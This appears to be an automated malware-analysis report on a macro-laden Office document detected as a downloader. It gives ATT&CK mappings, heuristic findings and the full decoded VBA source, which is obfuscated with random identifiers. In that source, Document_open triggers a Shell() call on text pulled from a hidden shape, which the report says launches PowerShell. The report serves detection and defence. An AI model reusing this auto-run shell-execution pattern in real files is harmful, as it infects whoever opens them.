MALICIOUS
Risk Score: 272

Malware Insights

MITRE ATT&CK:
- T1059.001 PowerShell
- T1059.003 Windows Command Shell
- T1566.001 Spearphishing Attachment
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro utilizes a Shell() call to execute a command that invokes cmd.exe, which in turn launches PowerShell. This PowerShell command appears to be designed to download and execute a second-stage payload from a remote source, as indicated by the suspicious command structure and the ClamAV detection name 'Doc.Downloader.Valyria-6768931-0'.
Heuristics (9)

- ClamAV: Doc.Downloader.Valyria-6768931-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Valyria-6768931-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Potential Shell call in VBA [critical, OLE_VBA_SHELL]: Potential Shell call in VBA. Matched lines in script:
  End If
  aXiBbciYl = Shell(nizhMbTJBj + FZuoND + PDaZo, bAnEVvufKL)
  If (DwAbTFLCu <> 0 Or WottjB) Then
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro [low, OLE_VBA_DOCOPEN]: Document_Open macro. Matched lines in script:
  End Function
  Private Sub Document_open()
  If (zvifGwjz <> 0 Or FiaTz) Then
- Suspicious cmd.exe invocation with execution flag [high, SC_STR_CMD]: Suspicious cmd.exe invocation with execution flag
- Reference to PowerShell [high, SC_STR_POWERSHELL]: Reference to PowerShell
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4495 bytes |

SHA-256: 5c166e97f4b01013fa010acf9258ba2e9d38a4dced48e2c177d67b132712b06a

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 48 of 81 identifiers look randomly generated (e.g. 'cLMwbmJFctwpz'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "cLMwbmJFctwpz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function PHjJOvfi()
Const bAnEVvufKL = 728213473 - 728213473
If (lhTlNZ <> 0 Or BmAbihvDP) Then
BmAbihvDP = True
mnuHSaF = mnuHSaF & Atn(lhTlNZ)
If (lhTlNZ = 1) Then
mnuHSaF = mnuHSaF & "Cojsj"
Else
mnuHSaF = mnuHSaF & "wmbMNHj"
End If
End If
If (MrjSI <> 0 Or fCjobd) Then
fCjobd = True
qMSHNiLkP = qMSHNiLkP & CInt(MrjSI)
If (MrjSI = 1) Then
qMSHNiLkP = qMSHNiLkP & "CdfwF"
Else
qMSHNiLkP = qMSHNiLkP & "pIuvdiPj"
End If
End If
nizhMbTJBj = Shapes(1).TextFrame.ContainingRange
If (WlAEItzvP <> 0 Or GtFiYwjjp) Then
GtFiYwjjp = True
RaTqjjh = RaTqjjh & CByte(WlAEItzvP)
If (WlAEItzvP = 1) Then
RaTqjjh = RaTqjjh & "IwiARmp"
Else
RaTqjjh = RaTqjjh & "PEtkhAppi"
End If
End If
If (QEljCRTa <> 0 Or SJXcLcmTL) Then
SJXcLcmTL = True
bSpah = bSpah & CDbl(QEljCRTa)
If (QEljCRTa = 1) Then
bSpah = bSpah & "nEvQkdHR"
Else
bSpah = bSpah & "QQXQjiwLs"
End If
End If
If (COzfdUpmU <> 0 Or QVaBjr) Then
QVaBjr = True
Zjdtz = Zjdtz & Atn(COzfdUpmU)
If (COzfdUpmU = 1) Then
Zjdtz = Zjdtz & "zDKOik"
Else
Zjdtz = Zjdtz & "BujhHzp"
End If
End If
If (jRYFO <> 0 Or icnWbiD) Then
icnWbiD = True
PMXJL = PMXJL & CInt(jRYFO)
If (jRYFO = 1) Then
PMXJL = PMXJL & "CGlvMODi"
Else
PMXJL = PMXJL & "dHwuczV"
End If
End If
aXiBbciYl = Shell(nizhMbTJBj + FZuoND + PDaZo, bAnEVvufKL)
If (DwAbTFLCu <> 0 Or WottjB) Then
WottjB = True
wQXTFilA = wQXTFilA & CInt(DwAbTFLCu)
If (DwAbTFLCu = 1) Then
wQXTFilA = wQXTFilA & "IOjAc"
Else
wQXTFilA = wQXTFilA & "djDAp"
End If
End If
If (LuXza <> 0 Or OJMfBtdYf) Then
OJMfBtdYf = True
wSObMzw = wSObMzw & CInt(LuXza)
If (LuXza = 1) Then
wSObMzw = wSObMzw & "ulRLJpj"
Else
wSObMzw = wSObMzw & "mmFdvF"
End If
End If
End Function
Private Sub Document_open()
If (zvifGwjz <> 0 Or FiaTz) Then
FiaTz = True
zCEoZC = zCEoZC & CByte(zvifGwjz)
If (zvifGwjz = 1) Then
zCEoZC = zCEoZC & "WwpHqTCis"
Else
zCEoZC = zCEoZC & "TpOBOq"
End If
End If
If (kODkAlSp <> 0 Or jtAPUjzYl) Then
jtAPUjzYl = True
zHNvXNUHd = zHNvXNUHd & CDbl(kODkAlSp)
If (kODkAlSp = 1) Then
zHNvXNUHd = zHNvXNUHd & "LiLQBoow"
Else
zHNvXNUHd = zHNvXNUHd & "vDoBcWpr"
End If
End If
If (RWQQPZz <> 0 Or wYIHlSMPq) Then
wYIHlSMPq = True
OiYmtzAL = OiYmtzAL & Atn(RWQQPZz)
If (RWQQPZz = 1) Then
OiYmtzAL = OiYmtzAL & "RowrVIq"
Else
OiYmtzAL = OiYmtzAL & "XkVaMK"
End If
End If
If (GQccAofXS <> 0 Or WjioGfzh) Then
WjioGfzh = True
NjuBmpmK = NjuBmpmK & CByte(GQccAofXS)
If (GQccAofXS = 1) Then
NjuBmpmK = NjuBmpmK & "lZiWU"
Else
NjuBmpmK = NjuBmpmK & "XRiFL"
End If
End If
PHjJOvfi
If (ZOjpL <> 0 Or sSwzw) Then
sSwzw = True
dSPDDiFz = dSPDDiFz & CByte(ZOjpL)
If (ZOjpL = 1) Then
dSPDDiFz = dSPDDiFz & "mzvEoiUM"
Else
dSPDDiFz = dSPDDiFz & "TMzsY"
End If
End If
If (jFmEYYK <> 0 Or iuSFWJcGp) Then
iuSFWJcGp = True
nPnlXX = nPnlXX & CByte(jFmEYYK)
If (jFmEYYK = 1) Then
nPnlXX = nPnlXX & "Gvdliku"
Else
nPnlXX = nPnlXX & "bXcTuIN"
End If
End If
If (VtMOp <> 0 Or rFHZkWovi) Then
rFHZkWovi = True
hSdhGA = hSdhGA & CInt(VtMOp)
If (VtMOp = 1) Then
hSdhGA = hSdhGA & "Xbvmzn"
Else
hSdhGA = hSdhGA & "KZblPdLIQ"
End If
End If
End Sub